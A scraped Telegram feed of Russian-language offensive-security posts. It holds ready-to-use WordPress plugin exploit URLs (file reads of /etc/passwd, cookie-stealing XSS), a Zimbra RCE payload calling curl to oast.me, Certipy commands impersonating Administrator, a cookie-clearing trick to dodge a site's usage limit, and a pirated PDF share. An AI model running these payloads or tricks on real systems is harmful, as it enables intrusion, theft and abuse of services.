Forwarded from Proxy Bar
Прекрасное в мире плагинов WordPress
*
simple-image-manipulator
activehelper-livehelp
amministrazione-aperta
anti-plagiarism
buddypress-component-stats
dzs-videogallery
e-search
fancy-product-designer
hd-webplayer
localize-my-post
*
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php
e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php
localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Offensive Security обновили формат сдачи своего самого популярного экзамена OSCP!
Начиная с 1го ноября 2024г. пользователи имеют право обновить свой сертификат до версии OSCP+ (действителен 3 года), подтверждающий что данный человек сдал актуальную программу экзамена
Помимо прочего, изменения в сдаче экзамена так же коснутся по части внутреннего пентеста Active Directory (подробнее на скриншоте).
Стоимость обновления сертификата OSCP -> OSCP+
200$ (до 1 апреля 2025 г., после - 799$).
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Pentester
Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711)
https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
watchTowr Labs
Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711)
Every sysadmin is familiar with Veeam’s enterprise-oriented backup solution, ‘Veeam Backup & Replication’. Unfortunately, so is every ransomware operator, given it's somewhat 'privileged position' in the storage world of most enterprise's networks. There's…
Forwarded from SecuriXy.kz
Обновление легендарного инструмента #Impacket от Fortra до версии 0.12.0 включает несколько значительных улучшений:
1. Поддержка протоколов: Расширена поддержка Ethernet, Linux "Cooked" capture. IP, TCP, UDP, ICMP, IGMP, ARP. Поддержка IPv4 и IPv6. NMB и SMB1, SMB2 и SMB3 (высокоуровневые реализации). MSRPC версии 5, через различные транспорты: TCP, SMB/TCP, SMB/NetBIOS и HTTP. Обычная, NTLM и Kerberos аутентификация, с использованием паролей/хашей/билетов/ключей. Частичная/полная реализация следующих интерфейсов MSRPC: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI. Частичная реализация протоколов TDS (MSSQL) и LDAP.
2. Улучшение безопасности и Исправления багов
3. Поддержка новых версий Python3
Для полного списка изменений и загрузки новой версии вы можете посетить релиз на GitHub.
1. Поддержка протоколов: Расширена поддержка Ethernet, Linux "Cooked" capture. IP, TCP, UDP, ICMP, IGMP, ARP. Поддержка IPv4 и IPv6. NMB и SMB1, SMB2 и SMB3 (высокоуровневые реализации). MSRPC версии 5, через различные транспорты: TCP, SMB/TCP, SMB/NetBIOS и HTTP. Обычная, NTLM и Kerberos аутентификация, с использованием паролей/хашей/билетов/ключей. Частичная/полная реализация следующих интерфейсов MSRPC: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI. Частичная реализация протоколов TDS (MSSQL) и LDAP.
2. Улучшение безопасности и Исправления багов
3. Поддержка новых версий Python3
Для полного списка изменений и загрузки новой версии вы можете посетить релиз на GitHub.
pipx install impacket
🥱3🔥1
Forwarded from 1N73LL1G3NC3
Сети глазами хакера.pdf
73.8 MB
12 лучших работ @castercanal, для Xakep.ru.
P.S. Раз уж пираты выложили в паблик, то пусть будет и здесь. Кстати у автора есть канал.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4🥱1
Forwarded from Russian OSINT
Нашёл интересный сайт под названием - 🤖 OverallGPT. Он даёт возможность сравнивать ответы различных LLM. Например, если написать: "Что появилось раньше — курица или яйцо?" => можно получить ответы от OpenAI GPT-4o, Anthropic Claude 3.5 Sonnet, Google Gemini 1.5 flash и Llama 3.1 405B Instruct Turbo. Все ИИ-модели убеждены в том, что 🐣 яйцо.
⬇️ https://overallgpt.com/
💻 Лайфхак: для бесплатного использоваться даётся всего 2 попытки, но если 🧹 очистить куки и permissions, то попытки бесконечные. Через тот же Bypass Paywalls Clean можно в один клик это делать.
🛡 @Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥1❤1🔥1
Forwarded from 1N73LL1G3NC3
Zimbra - Remote Command Execution (CVE-2024-45519)
In this blog post, we delve into the nature of this vulnerability, our journey in analyzing the patch, and the steps we took to exploit it manually.
Proof of Concept (PoC)
With
Automating vulnerability detection with Nuclei: https://github.com/projectdiscovery/nuclei-templates/pull/10860/commits/d22c7d3315511f10fbd629518bf97c8105081730
In this blog post, we delve into the nature of this vulnerability, our journey in analyzing the patch, and the steps we took to exploit it manually.
Proof of Concept (PoC)
With
postjournal service enabled (port 10027), we ran our exploit against SMTP port 25 and observed successful command execution.EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <"aabbb$(curl${IFS}oast.me)"@mail.domain.com>
DATA
Test message
.
Automating vulnerability detection with Nuclei: https://github.com/projectdiscovery/nuclei-templates/pull/10860/commits/d22c7d3315511f10fbd629518bf97c8105081730
👍2🔥1
Forwarded from RedTeam brazzers (Миша)
Всех с понедельничним обзором картошек!!! :)
Зачастую наличие привилегии
Концептуально потатосы можно разделить на:
-
- Через кражу токена. Но это более редкий чейн, если у нас есть еще и SeDebugPrivilege, то мы можем стащить с любого чужого процесса токен и нацепить на свой пейлоад через
- Захват WPAD-аутентификации с NTLM Reflection атакой. Метод был пропатчен в MS16-075. Впрочем, POC HotPotato есть.
- Злоупотребление кешем LSA. Для предотвращения атак NTLM Reflection майкрософты придумали ввести некоторый список ресурсов, который хранился внутри LSA. Все заключалось в том, что LSASS стал хранить в кэше список всех недавно выданных NTLM Challenges с соответствующей службой, чтобы обнаружить попытки NTLM Reflection. Собственно, проводя сопоставление между челленджем и службой, на которой происходит аутентификация, можно было определить атаку. Косяк заключался в том, что кеш имел достаточно маленькое время жизни (300 секунд), после чего очищался. Хакеру оставалось разве что подождать это время, после чего дернуть LSA и эскалироваться. POC называется GhostPotato. Метод тоже уже пропатчен.
- Злоупотребление функциями имперсонации. В OSEP с нами делились сплойтом PrintSpoofer. Кто забыл, это вариант эксплуатации SeDebug через вызов функции принтера, которая принимает конкретную конечную точку — именованный канал (пайп). Хакер поднимал собственный пайп, триггерил функцией систему , и система приходила на пайп. Хакеру оставалось разве что вызвать
Наконец, есть и более общий вариант, который лишь поднимает службы HTTP и SMB. Как заставить систему зайти на них — дело ваше. В случае HTTP отдастся 401 запрос с захватом аутентификации, в случае SMB — имперсонация. Такая картошка называется GenericPotato
Зачастую наличие привилегии
SeImpersonatePrivilege ведет к повышению привилегий до системы. Однако я нигде не видел достаточно структурированной информации, в которой описывались бы не сами инструменты, а общий принцип их работы. Пора исправлять :)Концептуально потатосы можно разделить на:
-
DCOM-Based - огромная часть сплойтов абузит именно DCOM. Там в нескольких местах у нас вылезает аутентификация, выстраивается контекст, и из него уже можно извлечь токен. Примерно того же принципа придерживается и Krb Relay-штуки. Разве что мы там ловим тикет и идем с ним куда-нибудь, а здесь мы атакуем локальную систему. Как — узнаете уже очень скоро :)) Прошу прощения, видос с UnderConf задерживается, но я уже активно занимаюсь перегонкой материала в текстовый формат на хабре, с добавлением всяких штучек-дрючек :) Сюда входят JuicyPotatoNG, RottenPotato, LonelyPotato, JuicyPotato, RemotePotato, SweetPotato, GodPotato, RoguePotato, LocalPotato- Через кражу токена. Но это более редкий чейн, если у нас есть еще и SeDebugPrivilege, то мы можем стащить с любого чужого процесса токен и нацепить на свой пейлоад через
CreateProcessWithTokenW(). POC- Захват WPAD-аутентификации с NTLM Reflection атакой. Метод был пропатчен в MS16-075. Впрочем, POC HotPotato есть.
- Злоупотребление кешем LSA. Для предотвращения атак NTLM Reflection майкрософты придумали ввести некоторый список ресурсов, который хранился внутри LSA. Все заключалось в том, что LSASS стал хранить в кэше список всех недавно выданных NTLM Challenges с соответствующей службой, чтобы обнаружить попытки NTLM Reflection. Собственно, проводя сопоставление между челленджем и службой, на которой происходит аутентификация, можно было определить атаку. Косяк заключался в том, что кеш имел достаточно маленькое время жизни (300 секунд), после чего очищался. Хакеру оставалось разве что подождать это время, после чего дернуть LSA и эскалироваться. POC называется GhostPotato. Метод тоже уже пропатчен.
- Злоупотребление функциями имперсонации. В OSEP с нами делились сплойтом PrintSpoofer. Кто забыл, это вариант эксплуатации SeDebug через вызов функции принтера, которая принимает конкретную конечную точку — именованный канал (пайп). Хакер поднимал собственный пайп, триггерил функцией систему , и система приходила на пайп. Хакеру оставалось разве что вызвать
ImpersonateNamedPipeClient() для захвата учетной записи. Мало кто знает, но есть и другие уязвимые службы! DiagTrack — DiagTrackEop, RasMan service — RasmanPotato, AzureAttestService — magicAzureAttestService. Но не пайпами едиными. В COM тоже есть функция по имперсонации, называется CoImpersonateClient(), ею злоупотребляли в DCOMPotato .Наконец, есть и более общий вариант, который лишь поднимает службы HTTP и SMB. Как заставить систему зайти на них — дело ваше. В случае HTTP отдастся 401 запрос с захватом аутентификации, в случае SMB — имперсонация. Такая картошка называется GenericPotato
❤1
Forwarded from 1N73LL1G3NC3
KrbRelay-SMBServer
This krbrelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP.
This krbrelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP.
Relaying SMB to HTTP (ADCS) with a modified version of krbrelay using DFSCoerce and PetitPotam - classic ESC8 attack with Kerberos, no DCOM involved ;)
👍1
Forwarded from RedTeam brazzers (Миша)
Ретрансляция Kerberos. Хаброразбор.
После пучины долгих раздумий и определенных сложностей с новым инструментом для редактирования текстов на хабр, я хочу представить вам статью про релей кербероса. Если вы до сих пор откладывали эту интереснейшую тему для изучения, то пора взять себя в руки и погрузиться в глубины кербероса, DCOMа и релеев!
Вчера вышел еще один POC на Kerberos Relay — KrbRelay-SMBServer. Этот инструмент также не остался без внимания и я не забыл упомянуть его в статье.
Читать тут:
https://habr.com/ru/articles/848542/
После пучины долгих раздумий и определенных сложностей с новым инструментом для редактирования текстов на хабр, я хочу представить вам статью про релей кербероса. Если вы до сих пор откладывали эту интереснейшую тему для изучения, то пора взять себя в руки и погрузиться в глубины кербероса, DCOMа и релеев!
Вчера вышел еще один POC на Kerberos Relay — KrbRelay-SMBServer. Этот инструмент также не остался без внимания и я не забыл упомянуть его в статье.
Читать тут:
https://habr.com/ru/articles/848542/
Forwarded from SecuriXy.kz
В certipy завезли новый вектор атаки #ESC15 на центр сертификации ADCS, которая использует специфические настройки шаблонов сертификатов, которые соответствуют большинству первичных условий атаки ESC1 или на ESC3, а именно:
1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты.
2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей.
3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости.
Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников.
Примеры:
1. Запрос сертификата с указанием ‘Client Authentication’ EKU:
2. Запрос сертификата с указанием OID для ‘Client Authentication’:
-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных.
-> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым.
https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47
1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты.
2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей.
3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости.
Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников.
Примеры:
1. Запрос сертификата с указанием ‘Client Authentication’ EKU:
certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies 'Client Authentication'
2. Запрос сертификата с указанием OID для ‘Client Authentication’:
certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies '1.3.6.1.5.5.7.3.2'
-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных.
-> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым.
https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
Weakpass 4
A collection of password lists for various purposes from penetration testing to improving password security.
Crack-JS - hash cracking immediately and only with your browser.
Hash lookup - find passwords for hashes like MD5, NTLM, SHA1, and SHA256.
Password Generator - generate a wordlist based on a set of words entered by the user and rules.
P.S. Just to mention another great work and compilation of wordlists: https://github.com/berzerk0/Probable-Wordlists
A collection of password lists for various purposes from penetration testing to improving password security.
Crack-JS - hash cracking immediately and only with your browser.
Hash lookup - find passwords for hashes like MD5, NTLM, SHA1, and SHA256.
Password Generator - generate a wordlist based on a set of words entered by the user and rules.
P.S. Just to mention another great work and compilation of wordlists: https://github.com/berzerk0/Probable-Wordlists
👍2
Forwarded from 1N73LL1G3NC3
Kerberos relaying from SMB to ADCS. Especially great when ESC8 was mitigated by disabling NTLM auth on the ADCS server.
Powered by:
https://github.com/decoder-it/KrbRelay-SMBServer/
https://github.com/wh04m1001/dfscoerce
https://github.com/CCob/gssapi-abuse
Powered by:
https://github.com/decoder-it/KrbRelay-SMBServer/
https://github.com/wh04m1001/dfscoerce
https://github.com/CCob/gssapi-abuse
Forwarded from Russian OSINT
💻 F.A.C.C.T. выпустила подробное исследование группировки «двойного назначения» Shadow/Twelve, которая активно атакует 🇷🇺 российские организации.
Обнаруженный преступный синдикат продемонстрировал тенденцию — группы «двойного назначения»:
💠 Shadow заинтересована в 🔒 вымогательстве денег.
💠 Twelve стремилась к полному ⚠️ разрушению ИТ-инфраструктуры своих жертв.
Одним из фирменных приемов группы стала кража учетных записей в🛡 Telegram на устройствах жертв, что после проведения атак позволяло им шпионить за сотрудниками атакованной компании и оказывать дополнительное давление.
Исследование может быть полезно руководителям групп кибербезопасности, аналитикам SOC, CERT, специалистам по реагированию на инциденты, Threat Intelligence и Threat Hunting, а также компаниям из различных секторов для подготовки проактивной защиты.
https://www.facct.ru/resources/research-hub/shadow-twelve-2024
✋ @Russian_OSINT
Обнаруженный преступный синдикат продемонстрировал тенденцию — группы «двойного назначения»:
Одним из фирменных приемов группы стала кража учетных записей в
Исследование может быть полезно руководителям групп кибербезопасности, аналитикам SOC, CERT, специалистам по реагированию на инциденты, Threat Intelligence и Threat Hunting, а также компаниям из различных секторов для подготовки проактивной защиты.
https://www.facct.ru/resources/research-hub/shadow-twelve-2024
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣1